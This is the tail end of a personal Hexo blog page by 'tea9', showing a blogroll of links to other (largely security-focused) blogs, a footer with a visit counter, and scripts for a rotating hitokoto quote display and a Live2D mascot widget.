          <a href="https://www.lkxin.cn" title="https://www.lkxin.cn" rel="noopener" target="_blank">清酒踏月</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://www.ad-s.cn/" title="http://www.ad-s.cn/" rel="noopener" target="_blank">冰峰博客</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://1000yun.cn/" title="https://1000yun.cn/" rel="noopener" target="_blank">雨落泪尽</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://laugh12321.github.io" title="https://laugh12321.github.io" rel="noopener" target="_blank">Laugh's Blog</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.xiz.im" title="https://www.xiz.im" rel="noopener" target="_blank">Xiang Xiz</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.xx8.uk" title="https://www.xx8.uk" rel="noopener" target="_blank">lan酱的小窝</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://poi.ac/" title="http://poi.ac/" rel="noopener" target="_blank">星夜的蓝天</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://www.oneinf.com" title="http://www.oneinf.com" rel="noopener" target="_blank">俍注</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://darkwing.moe/" title="https://darkwing.moe/" rel="noopener" target="_blank">暗羽表姐</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://ju5tw4nty0u.top/" title="http://ju5tw4nty0u.top/" rel="noopener" target="_blank">ju5tw4nty0u</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.k0rz3n.com/" title="https://www.k0rz3n.com/" rel="noopener" target="_blank">k0rz3n</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://ikmoe.com/" title="http://ikmoe.com/" rel="noopener" target="_blank">月宅酱</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.xytsing.com" title="https://www.xytsing.com" rel="noopener" target="_blank">咸鱼滩音乐团队</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://eternalsakura13.com/" title="http://eternalsakura13.com/" rel="noopener" target="_blank">sakura</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://snowflowersnowflake.github.io/" title="https://snowflowersnowflake.github.io/" rel="noopener" target="_blank">y00</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://www.teagle.top/" title="http://www.teagle.top/" rel="noopener" target="_blank">楼兰</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://console-log.cn/" title="http://console-log.cn/" rel="noopener" target="_blank">Xenc</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://1337er.com" title="http://1337er.com" rel="noopener" target="_blank">CyberSecurity</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://blog.csdn.net/zcj_1996" title="https://blog.csdn.net/zcj_1996" rel="noopener" target="_blank">secES</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://milktea.info" title="https://milktea.info" rel="noopener" target="_blank">奶茶姐姐</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://evil-of-blad.github.io/" title="https://evil-of-blad.github.io/" rel="noopener" target="_blank">blad</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://blog.xiafeng2333.top/" title="https://blog.xiafeng2333.top/" rel="noopener" target="_blank">夏风</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.hackpwn.xyz/" title="https://www.hackpwn.xyz/" rel="noopener" target="_blank">Catsay</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://zhzhdoai.github.io/" title="https://zhzhdoai.github.io/" rel="noopener" target="_blank">osword</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://evilwing.me/" title="https://evilwing.me/" rel="noopener" target="_blank">wing</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.xynh.ink/" title="https://www.xynh.ink/" rel="noopener" target="_blank">筱一</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://cyto.top/" title="https://cyto.top/" rel="noopener" target="_blank">Cytosine</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://qtfreet.com/" title="https://qtfreet.com/" rel="noopener" target="_blank">qtfreet00</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.appleos.xyz/" title="https://www.appleos.xyz/" rel="noopener" target="_blank">B.S.</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://eternalsakura13.com" title="https://eternalsakura13.com" rel="noopener" target="_blank">樱花</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://api-caller.com/" title="https://api-caller.com/" rel="noopener" target="_blank">智姐姐</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://lingze.xyz/" title="https://lingze.xyz/" rel="noopener" target="_blank">lingze</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://h4ck.org.cn/" title="http://h4ck.org.cn/" rel="noopener" target="_blank">obaby</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://blogs.360.cn/" title="https://blogs.360.cn/" rel="noopener" target="_blank">360 核心安全技术博客</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.sqlsec.com/" title="https://www.sqlsec.com/" rel="noopener" target="_blank">国光</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.whsgwl.net/" title="https://www.whsgwl.net/" rel="noopener" target="_blank">晏子霜</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://lrxa.herokuapp.com" title="https://lrxa.herokuapp.com" rel="noopener" target="_blank">利刃信安</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://github.com/WooyunDota" title="https://github.com/WooyunDota" rel="noopener" target="_blank">瘦蛟舞</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">tea9</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/mist/" class="theme-link" rel="noopener" target="_blank">NexT.Mist</a> 强力驱动
  
  </div>
  <div>
  网站浏览量：
  <img src="https://count.getloli.com/get/@tea9.xyz"/>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
<script src="/js/utils.js"></script>
<script src="/js/schemes/muse.js"></script>
<script src="/js/next-boot.js"></script>



  




  <script src="/js/local-search.js"></script>












  

  

  <script src="https://cdn.jsdelivr.net/npm/bluebird@3/js/browser/bluebird.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/whatwg-fetch@2.0.4/fetch.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.slim.min.js"></script>
  <script src="https://cdn.staticfile.org/jquery/1.10.2/jquery.min.js">
</script>
  
<script>
  
    window.hitokoto_playlist = 2158283120;
    // CheckOS
    var os = function () {
      var ua = navigator.userAgent,
        isWindowsPhone = /(?:Windows Phone)/.test(ua),
        isSymbian = /(?:SymbianOS)/.test(ua) || isWindowsPhone,
        isAndroid = /(?:Android)/.test(ua),
        isFireFox = /(?:Firefox)/.test(ua),
        isChrome = /(?:Chrome|CriOS)/.test(ua),
        isTablet = /(?:iPad|PlayBook)/.test(ua) || (isAndroid && !/(?:Mobile)/.test(ua)) || (isFireFox &&
          /(?:Tablet)/.test(ua)),
        isPhone = /(?:iPhone)/.test(ua) && !isTablet,
        isPc = !isPhone && !isAndroid && !isSymbian;
      return {
        isTablet: isTablet,
        isPhone: isPhone,
        isAndroid: isAndroid,
        isPc: isPc
      };
    }();

    // Animate
    $.fn.extend({
      animateCss: function (animationName, callback) {
        var animationEnd = (function (el) {
          var animations = {
            animation: 'animationend',
            OAnimation: 'oAnimationEnd',
            MozAnimation: 'mozAnimationEnd',
            WebkitAnimation: 'webkitAnimationEnd',
          };

          for (var t in animations) {
            if (el.style[t] !== undefined) {
              return animations[t];
            }
          }
        })(document.createElement('div'));

        this.addClass('animated ' + animationName).one(animationEnd, function () {
          $(this).removeClass('animated ' + animationName);

          if (typeof callback === 'function') callback();
        });

        return this;
      },
    });

    function tadaHeart() {
      $('#like_number1').animateCss('tada');
      $('#like_number2').animateCss('tada');
    }
    var tada = window.setInterval(tadaHeart, 600);

    // Love Hitokoto !
    var like_num = parseInt("7");
    var sentenceUUID = "f32de80e-0bbb-4fb6-8143-0a33ef49f08f";
    function aa()
      {
        fetch('https://v1.hitokoto.cn')
          .then(function (res){
            return res.json();
          })
          .then(function (data) {
            sentenceUUID = data.uuid;
              // like_num = result.data[0].total;
              // $("#like_number1").attr("data-badge", result.data[0].total);
              // $("#like_number2").attr("data-badge", result.data[0].total);
             // if ($('#hitokoto').hasClass("animated")) {
             //    $('#hitokoto').removeClass("animated");
             //    $('#hitokoto').removeClass("fadeIn");
             //  }
             //  $('#hitokoto').animateCss('bounce');
            // var hitokoto = document.getElementById('hitokoto');
            // hitokoto.innerText = data.hitokoto + '——【' + data.from + '】';
           $('#hitokoto_text').text(data.hitokoto);
           $("#hitokoto").fadeIn("slow");
           $('#hitokoto').fadeIn(3000);
            var author = !!data.from ? data.from : "无名氏";
            $('#hitokoto_author').text("—— " + (data.from_who || '') + "「" + author + "」");
            window.setTimeout(aa, 10000);
          })
          .catch(function (err) {
            console.log(err);
            aa();
          })
      }
   
    
    //   var isID = 0;
    // if (!isID) {
    //   window.setTimeout(aa, 10000);
    // }
    aa();
    
  
</script>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/hijiki.model.json"},"display":{"position":"right","width":200,"height":350},"mobile":{"show":true},"log":false});</script></body>
</html>
